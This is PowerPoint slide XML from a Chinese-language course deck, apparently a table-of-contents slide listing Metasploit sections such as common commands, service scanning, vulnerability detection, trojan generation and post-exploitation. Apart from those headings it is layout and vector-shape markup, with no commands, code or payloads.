              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.1 认识Metasploit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="3919220"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.2 常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="4504690"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="5090160"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="5675630"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.5 生成木马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="6261100"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.6 后渗透攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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0" name="组合 49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="258445" y="2941320"/>
            <a:ext cx="11638280" cy="2962910"/>
            <a:chOff x="407" y="2772"/>
            <a:chExt cx="18328" cy="4666"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="407" y="5987"/>
              <a:ext cx="18328" cy="121"/>
              <a:chOff x="1765833" y="4036682"/>
              <a:chExt cx="9317522" cy="50962"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3" name="Rectangle 4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3040807" y="4036682"/>
                <a:ext cx="1683494" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="4" name="Rectangle 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4724303" y="4036682"/>
                <a:ext cx="1715155" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="Rectangle 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6435557" y="4036682"/>
                <a:ext cx="1661572" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Rectangle 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8087643" y="4036682"/>
                <a:ext cx="1720740" cy="50962"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Rectangle 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1765833" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Rectangle 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9808382" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8057" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="7980911" y="2484779"/>
              <a:chExt cx="1304470" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="10" name="Group 11"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7980911" y="2484779"/>
                <a:ext cx="1304470" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="17" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent4"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="18" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Oval 12"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8347955" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="3810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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="12" name="Group 13"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="8468992" y="4362838"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="8216107" y="2577307"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13" name="AutoShape 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8216107" y="2577307"/>
                  <a:ext cx="464344" cy="464344"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10800 87"/>
                    <a:gd name="T1" fmla="*/ T0 w 21426"/>
                    <a:gd name="T2" fmla="+- 0 10799 73"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T4" fmla="+- 0 10800 87"/>
                    <a:gd name="T5" fmla="*/ T4 w 21426"/>
                    <a:gd name="T6" fmla="+- 0 10799 73"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T8" fmla="+- 0 10800 87"/>
                    <a:gd name="T9" fmla="*/ T8 w 21426"/>
                    <a:gd name="T10" fmla="+- 0 10799 73"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T12" fmla="+- 0 10800 87"/>
                    <a:gd name="T13" fmla="*/ T12 w 21426"/>
                    <a:gd name="T14" fmla="+- 0 10799 73"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21453"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21426" h="21453">
                      <a:moveTo>
                        <a:pt x="8034" y="20112"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5816" y="17892"/>
                        <a:pt x="3556" y="15628"/>
                        <a:pt x="1338" y="13408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3241" y="7240"/>
                        <a:pt x="11488" y="7509"/>
                        <a:pt x="13391" y="1341"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15609" y="3560"/>
                        <a:pt x="17869" y="5825"/>
                        <a:pt x="20087" y="8045"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18184" y="14212"/>
                        <a:pt x="9937" y="13944"/>
                        <a:pt x="8034" y="20112"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21034" y="7097"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="14338" y="393"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14006" y="60"/>
                        <a:pt x="13525" y="-73"/>
                        <a:pt x="13069" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12828" y="98"/>
                        <a:pt x="12614" y="222"/>
                        <a:pt x="12444" y="393"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12292" y="545"/>
                        <a:pt x="12177" y="733"/>
                        <a:pt x="12112" y="944"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11808" y="1929"/>
                        <a:pt x="11283" y="2785"/>
                        <a:pt x="10507" y="3562"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9471" y="4598"/>
                        <a:pt x="8121" y="5384"/>
                        <a:pt x="6693" y="6214"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5177" y="7094"/>
                        <a:pt x="3611" y="8006"/>
                        <a:pt x="2328" y="9290"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1237" y="10383"/>
                        <a:pt x="493" y="11600"/>
                        <a:pt x="59" y="13011"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-87" y="13488"/>
                        <a:pt x="40" y="14004"/>
                        <a:pt x="391" y="14356"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="7087" y="21060"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7419" y="21393"/>
                        <a:pt x="7900" y="21526"/>
                        <a:pt x="8356" y="21414"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8597" y="21354"/>
                        <a:pt x="8811" y="21231"/>
                        <a:pt x="8981" y="21060"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9133" y="20908"/>
                        <a:pt x="9248" y="20720"/>
                        <a:pt x="9314" y="20508"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9617" y="19523"/>
                        <a:pt x="10142" y="18667"/>
                        <a:pt x="10918" y="17890"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11954" y="16853"/>
                        <a:pt x="13304" y="16069"/>
                        <a:pt x="14733" y="15239"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16248" y="14357"/>
                        <a:pt x="17814" y="13446"/>
                        <a:pt x="19097" y="12162"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20188" y="11070"/>
                        <a:pt x="20932" y="9852"/>
                        <a:pt x="21366" y="8440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21512" y="7965"/>
                        <a:pt x="21385" y="7448"/>
                        <a:pt x="21034" y="7097"/>
                      </a:cubicBezTo>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14" name="AutoShape 53"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8390732" y="2736850"/>
                  <a:ext cx="125413" cy="130175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10801 59"/>
                    <a:gd name="T1" fmla="*/ T0 w 21484"/>
                    <a:gd name="T2" fmla="+- 0 10799 41"/>
